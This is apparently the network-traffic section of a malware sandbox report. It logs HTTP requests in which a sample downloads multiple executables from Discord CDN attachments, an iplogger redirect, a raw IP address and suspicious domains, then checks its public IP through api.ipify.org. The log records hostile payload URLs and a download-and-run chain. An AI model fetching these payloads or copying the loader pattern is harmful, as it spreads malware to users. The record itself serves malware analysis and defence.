Network Analysis

GET /raw/VVpUeH0C HTTP/1.1 Host: pastebin.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Mon, 05 Apr 2021 04:28:00 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=db90641bb9dcf13375f4e86778fd5949b1617596879; expires=Wed, 05-May-21 04:27:59 GMT; path=/; domain=.pastebin.com; HttpOnly; SameSite=Lax; Secure x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: EXPIRED cf-request-id: 0941e2a8960000e9d85aaf3000000001 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Server: cloudflare CF-RAY: 63b006edbbe1e9d8-ICN

GET /attachments/826416818390040589/826540039764705360/7525b875713675d4ff0018cf084f493a4e4977de_2021-03-30_22-25.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Mon, 05 Apr 2021 04:28:07 GMT Content-Type: application/x-msdos-program Content-Length: 505856 Connection: keep-alive Set-Cookie: __cfduid=d4cf7c7f9f3f4a06f260720fcc1a69fe51617596887; expires=Wed, 05-May-21 04:28:07 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax CF-Ray: 63b00721dff8e9f0-ICN Accept-Ranges: bytes Age: 451896 Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename=7525b875713675d4ff0018cf084f493a4e4977de_2021-03-30_22-25.exe ETag: "28345a7bb63babaf99e760965ce493b7" Expires: Tue, 05 Apr 2022 04:28:07 GMT Last-Modified: Tue, 30 Mar 2021 19:35:01 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 cf-request-id: 0941e2c92b0000e9f0d0826000000001 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1617132901889175 x-goog-hash: crc32c=Ws/4nQ== x-goog-hash: md5=KDRae7Y7q6+Z52CWXOSTtw== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 505856 X-GUploader-UploadID: ABg5-UznZNO55X93AubXlWYP0c5SyYOTRHkzDJhcIzrcH58RoyWaPDs0j0jqBmhsS-QvB5VHDoqPplp1xtV5hwkr0kW8h3tVvw X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=TLpBLQmgFXy6H8BnagOTruJ4Vqn%2Fw1s7OqqBoB7OD7m1U1UJd6OtvH2fN8DlTMSTkNfboawWgKZ%2FZ4kGE3UsJaXlD3grdOUTcD438M6Xw69KdM0%3D"}],"group":"cf-nel"} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare

GET /attachments/826416818390040589/826855866228670474/7525b875715555.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive

HTTP/1.1 403 Forbidden Date: Mon, 05 Apr 2021 04:28:07 GMT Content-Type: application/xml; charset=UTF-8 Content-Length: 223 Connection: keep-alive Set-Cookie: __cfduid=d8cd18283577c7710584319e7b75b91e71617596887; expires=Wed, 05-May-21 04:28:07 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax CF-Ray: 63b007224cf53532-ICN Cache-Control: private, max-age=0 Expires: Mon, 05 Apr 2021 04:28:07 GMT Vary: Accept-Encoding CF-Cache-Status: EXPIRED Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 cf-request-id: 0941e2c9700000353262a72000000001 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" X-GUploader-UploadID: ABg5-UweGdpxKnA0oqPmHGiWqUQGiYQ2LsTpPq-VEBeY-w_3LSy_yH34lxwniTQ5xKzeTn4eo_ZqhOJn5GN4rWbkzgAlx661mg X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=bXDXFYViyFNVmXz9pGWeIX47KIAvi4XwsoPkJGASviKHjes%2FmKPuFNxCBK008yfirjbXSQ0RXv2mfquDwbDT%2FRWnFZrAMLu08E7Punju2J5WpaQ%3D"}],"max_age":604800,"group":"cf-nel"} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare

GET /uk/s/o1ovzfe HTTP/1.1 Host: fex.net Connection: Keep-Alive

HTTP/1.1 200 OK Server: nginx/1.12.2 Date: Mon, 05 Apr 2021 04:28:30 GMT Content-Type: text/html Content-Length: 7520 Last-Modified: Sun, 28 Mar 2021 18:01:14 GMT Connection: keep-alive ETag: "6060c46a-1d60" X-Robots-Tag: noindex, nofollow Accept-Ranges: bytes

GET /2LehR6.exe HTTP/1.1 Host: iplogger.org Connection: Keep-Alive

HTTP/1.1 301 Moved Permanently Server: nginx Date: Mon, 05 Apr 2021 04:28:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=n7p8kbs39uk4m2k44b5fd0uju6; path=/; HttpOnly Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-cache Pragma: no-cache Set-Cookie: clhf03028ja=175.208.134.150; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=261451281; path=/ Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Location: https://cdn.discordapp.com/attachments/826416818390040589/826531006563352596/Bussed_2021-03-30_21-01.exe Strict-Transport-Security: max-age=31536000; preload X-Frame-Options: DENY

GET /attachments/826416818390040589/826531006563352596/Bussed_2021-03-30_21-01.exe HTTP/1.1 Host: cdn.discordapp.com

HTTP/1.1 200 OK Date: Mon, 05 Apr 2021 04:28:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d271a7de8974181c19a710d7b377f60621617596912; expires=Wed, 05-May-21 04:28:32 GMT; path=/; domain=.discordapp.com; HttpOnly; SameSite=Lax X-Frame-Options: SAMEORIGIN cf-request-id: 0941e32c040000e9f0b906c000000001 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=3jE%2B2KjgpHzSd2dfj1Cw8QsLAIGLSY2sD08%2FQjzoUKQaOvRiXaOh3IVnFt8I6%2BvPcqJrCgiPWR96Css3VOJNkPYZZC9TT3K%2BwiP3FPLvayX%2Fjvw%3D"}],"group":"cf-nel"} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 63b007bffa8de9f0-ICN alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400

GET /downloads/sfx_123_400.exe HTTP/1.1 Host: 203.159.80.228 Connection: Keep-Alive

HTTP/1.1 200 OK Date: Mon, 05 Apr 2021 04:28:06 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/8.0.2 Last-Modified: Fri, 02 Apr 2021 20:26:09 GMT ETag: "112eee-5bf0328827a40" Accept-Ranges: bytes Content-Length: 1126126 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload

GET /lukkeze.best.exe HTTP/1.1 Host: gurums.info Connection: Keep-Alive

HTTP/1.1 200 OK Connection: Keep-Alive Content-Type: application/x-msdownload Last-Modified: Wed, 10 Mar 2021 07:13:04 GMT Etag: "4280e-60487180-eb142a97dab1e4c8;;;" Accept-Ranges: bytes Content-Length: 272398 Date: Mon, 05 Apr 2021 04:28:06 GMT Server: LiteSpeed

GET /MMP2.exe HTTP/1.1 Host: gurums.info Connection: Keep-Alive

HTTP/1.1 200 OK Connection: Keep-Alive Content-Type: application/x-msdownload Last-Modified: Mon, 05 Apr 2021 04:25:04 GMT Etag: "4900e-606a9120-3dbe9eacf94eed7a;;;" Accept-Ranges: bytes Content-Length: 299022 Date: Mon, 05 Apr 2021 04:28:06 GMT Server: LiteSpeed

GET /load.php?pub=mixruzki HTTP/1.1 Host: whatitis.club Connection: Keep-Alive

HTTP/1.1 200 OK Server: nginx Date: Mon, 05 Apr 2021 04:28:07 GMT Content-Type: application/octet-stream Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/5.4.16 Content-Description: File Transfer Content-Disposition: attachment; filename=setup.exe Content-Transfer-Encoding: binary

GET /?format=xml HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C; .NET4.0E) Host: api.ipify.org Connection: Keep-Alive

HTTP/1.1 200 OK Server: Cowboy Connection: keep-alive Content-Type: text/plain Vary: Origin Date: Mon, 05 Apr 2021 04:28:45 GMT Content-Length: 15 Via: 1.1 vegur